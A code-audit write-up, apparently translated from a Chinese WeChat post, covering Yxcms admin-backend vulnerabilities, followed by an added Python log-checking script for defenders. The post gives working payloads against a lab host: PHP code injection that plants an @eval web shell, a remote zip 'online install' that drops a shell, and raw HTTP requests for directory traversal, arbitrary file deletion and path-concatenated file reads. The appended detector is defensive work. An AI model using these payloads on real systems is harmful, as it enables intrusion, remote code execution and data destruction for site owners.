http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=123
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');phpinfo();//
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');@eval($_POST[wj]);//
http://192.168.0.106/protected/apps/default/view/default/wj.php
http://192.168.0.106/protected/apps/default/view/default/acomment.php
http://192.168.0.106/protected/apps/wj/wj.php
http://192.168.0.106/index.php?r=appmanage/index/onlineinstall&url=http://192.168.0.106/wj.zip
http://192.168.0.106/protected/apps/wj/wj.php
POST /index.php?r=admin/sort/newsedit&id=100024 HTTP/1.1
Host: 192.168.0.106
Content-Length: 1309
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1mQQezLmVeBrWBoX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close

------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="parentid"

0
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="sortname"

分类信息
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="picture"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="oldpicture"


------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="keywords"

分类信息演示
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="description"

分类信息演示
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="num"

10
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="tplist"

news_sortindex
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="cnlist"

news_content*
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="norder"

0
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="ifmenu"

1
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="extendid"

0
------WebKitFormBoundary1mQQezLmVeBrWBoX--
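Where there is a first injection point there is a second; time is precious, so I am not going further with this one.
Directory traversal
Ineffective filtering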
http://192.168.0.106/index.php?r=admin/files/index&dirget=/../../../../../../../
There are several more directory traversal points as well; I will not write up the others.
Arbitrary file deletion
http://192.168.0.106/index.php?r=admin/files/del&fname=../../../../../../../../../../../../../1.txt
File name and path concatenation
POST /index.php?r=admin/set/tpgetcode HTTP/1.1
Host: 192.168.0.106
Content-Length: 50
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close

Mname=/../../../../../../../../../../&fname=/1.csv
POST /index.php?r=admin/set/tpgetcode HTTP/1.1
Host: 192.168.0.106
Content-Length: 50
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close

Mname=/&fname=/../../../../../../../../../../1.csv
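
For defenders reviewing web or WAF logs, the following is an added example (not part of the original post and not Yxcms code) that flags the request shapes shown above: `..` segments in `dirget`, `fname` and `Mname`, and code metacharacters in `app`. The function names, the character set and the sample lines are assumptions constructed for illustration, and it assumes POST bodies are available to the log pipeline.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Route -> parameters the post shows being joined into filesystem paths.
PATH_PARAMS = {
    "admin/files/index": ["dirget"],
    "admin/files/del": ["fname"],
    "admin/set/tpgetcode": ["Mname", "fname"],
}
APP_ROUTE = "appmanage/index/setdefault"
BAD_APP_CHARS = set("'\"();$/\\<>")  # assumed: an app name needs none of these

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment equals '..' after decoding and slash folding."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def classify(target, body=""):
    """Return findings for one request target plus optional urlencoded body."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for key, vals in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(vals)
    route = params.get("r", [""])[0]
    findings = [f"traversal:{name}" for name in PATH_PARAMS.get(route, [])
                if any(has_traversal(v) for v in params.get(name, []))]
    if route == APP_ROUTE and any(
            BAD_APP_CHARS & set(fully_decode(v)) for v in params.get("app", [])):
        findings.append("code-chars:app")
    return findings

# Constructed sample log entries (target, body), modelled on the requests above.
SAMPLES = [
    ("/index.php?r=appmanage/index/setdefault&app=123", ""),
    ("/index.php?r=admin/files/del&fname=../../../1.txt", ""),
    ("/index.php?r=admin/set/tpgetcode", "Mname=/&fname=/../../1.csv"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(classify(target, body) or "ok", target, body)
```

Both `Mname` and `fname` are checked because, as the two `tpgetcode` requests show, either half of the concatenated path can carry the traversal.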
Originally published on the WeChat official account Jie安全: Yxcms Code Audit: Admin Backend RCE (0day)